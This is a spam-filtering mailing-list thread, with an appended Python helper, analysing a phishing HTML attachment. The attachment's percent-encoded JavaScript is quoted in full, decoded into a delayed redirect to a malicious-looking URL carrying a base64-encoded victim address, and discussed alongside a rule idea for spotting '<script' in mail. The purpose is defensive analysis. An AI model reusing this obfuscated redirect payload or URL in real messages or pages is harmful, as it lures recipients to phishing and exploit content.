Posted to users@spamassassin.apache.org by Alex <my...@gmail.com> on 2021/06/30 15:28:09 UTC

javascript phish

Hi,
I'm using SA with amavisd and keep receiving emails with image
attachments with random filenames and "Billing - Release.html" that
contains the following javascript. What does it do? How do we block
them, outside of blocking HTML altogether?

<script language="javascript">
document.write(unescape('%3c%2f%64%69%76%3e%0a%3c%70%3e%20%44%65%61%72%2c%20%3c%62%2f%3e%42%69%6c%6c%69%6e%67%3c%2f%62%3e%0a%0a%3c%73%63%72%69%70%74%20%74%79%70%65%3d%22%74%65%78%74%2f%4a%61%76%61%53%63%72%69%70%74%22%3e%0a%20%20%20%20%20%20%73%65%74%54%69%6d%65%6f%75%74%28%22%6c%6f%63%61%74%69%6f%6e%2e%68%72%65%66%20%3d%20%27%68%74%74%70%73%3a%2f%2f%75%66%61%78%2e%77%6f%72%6b%2f%59%6d%6c%73%62%47%6c%75%5a%30%42%7a%62%57%46%79%64%47%31%73%63%79%35%6a%62%32%30%3d%27%3b%22%2c%29%3b%0a%20%3c%2f%73%63%72%69%70%74%3e'));
</script>

Re: javascript phish

Posted by Bill Cole <sa...@billmail.scconsult.com>.
On 2021-06-30 at 11:28:09 UTC-0400 (Wed, 30 Jun 2021 11:28:09 -0400)
Alex <my...@gmail.com>
is rumored to have said:

> Hi,
> I'm using SA with amavisd and keep receiving emails with image
> attachments with random filenames and "Billing - Release.html" that
> contains the following javascript. What does it do? How do we block
> them, outside of blocking HTML altogether?

You could look for script tags in the message. There's no sane reason to 
embed scripts in email. Unfortunately, you probably want to NOT reject 
messages like this one, which quotes a very sketchy script. It might be 
possible to look for '<script' in the rawbody and only act on it if 
there is no '<script' in the interpreted body text. Obviously I have not 
tried this. Yet.


> <script language="javascript">
> document.write(unescape('%3c%2f%64%69%76%3e%0a%3c%70%3e%20%44%65%61%72%2c%20%3c%62%2f%3e%42%69%6c%6c%69%6e%67%3c%2f%62%3e%0a%0a%3c%73%63%72%69%70%74%20%74%79%70%65%3d%22%74%65%78%74%2f%4a%61%76%61%53%63%72%69%70%74%22%3e%0a%20%20%20%20%20%20%73%65%74%54%69%6d%65%6f%75%74%28%22%6c%6f%63%61%74%69%6f%6e%2e%68%72%65%66%20%3d%20%27%68%74%74%70%73%3a%2f%2f%75%66%61%78%2e%77%6f%72%6b%2f%59%6d%6c%73%62%47%6c%75%5a%30%42%7a%62%57%46%79%64%47%31%73%63%79%35%6a%62%32%30%3d%27%3b%22%2c%29%3b%0a%20%3c%2f%73%63%72%69%70%74%3e'));
> </script>

That says:

	document.write(unescape('</div>
	<p> Dear, <b/>Billing</b>

	<script type="text/JavaScript">
	      setTimeout("location.href = 'https://ufax.work/YmlsbGluZ0BzbWFydG1scy5jb20=';",);
	 </script>'));

So the script opens that URL.

The base64 string at the end of the URL decodes to 
"billing@smartmls.com"

The URL redirects either to an innocuous Wikipedia page or a very much 
NOT innocuous jumbled mess of JavaScript that probably causes an 
appropriately vulnerable computer to go on a rampage slaughtering 
children and kittens.


-- 
Bill Cole
bill@scconsult.com or billcole@apache.org
(AKA @grumpybozo and many *@billmail.scconsult.com addresses)
Not Currently Available For Hire
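Bill's manual decoding of the unescape() payload, done mechanically: an added Python triage helper (not from the thread, and not part of SpamAssassin or amavisd) that unwraps document.write(unescape('...')) layers, pulls out any location.href redirect and decodes a trailing base64 path segment. The sample input is the attachment script quoted above; the function names are my own.

```python
import base64
import re

# Constructed sample: the "Billing - Release.html" script quoted in the thread.
SAMPLE_HTML = (
    '<script language="javascript">\n'
    "document.write(unescape('%3c%2f%64%69%76%3e%0a%3c%70%3e%20%44%65%61%72%2c%20%3c%62%2f%3e%42%69%6c%6c%69%6e%67%3c%2f%62%3e%0a%0a%3c%73%63%72%69%70%74%20%74%79%70%65%3d%22%74%65%78%74%2f%4a%61%76%61%53%63%72%69%70%74%22%3e%0a%20%20%20%20%20%20%73%65%74%54%69%6d%65%6f%75%74%28%22%6c%6f%63%61%74%69%6f%6e%2e%68%72%65%66%20%3d%20%27%68%74%74%70%73%3a%2f%2f%75%66%61%78%2e%77%6f%72%6b%2f%59%6d%6c%73%62%47%6c%75%5a%30%42%7a%62%57%46%79%64%47%31%73%63%79%35%6a%62%32%30%3d%27%3b%22%2c%29%3b%0a%20%3c%2f%73%63%72%69%70%74%3e'));\n"
    '</script>\n'
)

_ESC_RE = re.compile(r'%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})')

def js_unescape(s):
    """Mimic JavaScript's legacy unescape(): expand %XX and %uXXXX sequences."""
    return _ESC_RE.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), s)

def decode_document_write(html):
    """Return the decoded string of every document.write(unescape('...')) call."""
    calls = re.findall(r"document\.write\(\s*unescape\(\s*'([^']*)'\s*\)\s*\)", html)
    return [js_unescape(c) for c in calls]

def extract_redirects(markup):
    """Find location / location.href assignments in the decoded markup."""
    return re.findall(r"""location(?:\.href)?\s*=\s*['"]([^'"]+)['"]""", markup)

def decode_base64_suffix(url):
    """Decode a trailing base64 path segment (here it carries the target address)."""
    segment = url.rstrip('/').rsplit('/', 1)[-1]
    try:
        return base64.b64decode(segment, validate=True).decode('utf-8')
    except (ValueError, UnicodeDecodeError):
        return None

def triage(html):
    """Summarise what the attachment's obfuscated script does once a browser renders it."""
    report = {'script_tags': len(re.findall(r'<script', html, re.I)),
              'decoded_layers': [], 'redirects': [], 'embedded_targets': []}
    for layer in decode_document_write(html):
        report['decoded_layers'].append(layer)
        # the decoded layer injects a second <script>, invisible to a raw-only check
        report['script_tags'] += len(re.findall(r'<script', layer, re.I))
        for url in extract_redirects(layer):
            report['redirects'].append(url)
            target = decode_base64_suffix(url)
            if target:
                report['embedded_targets'].append(target)
    return report
```

Running triage() over an extracted HTML attachment gives you the redirect URL and the base64-embedded recipient address as plain fields, which is what you want to log or feed into a rule rather than the raw percent-encoded blob.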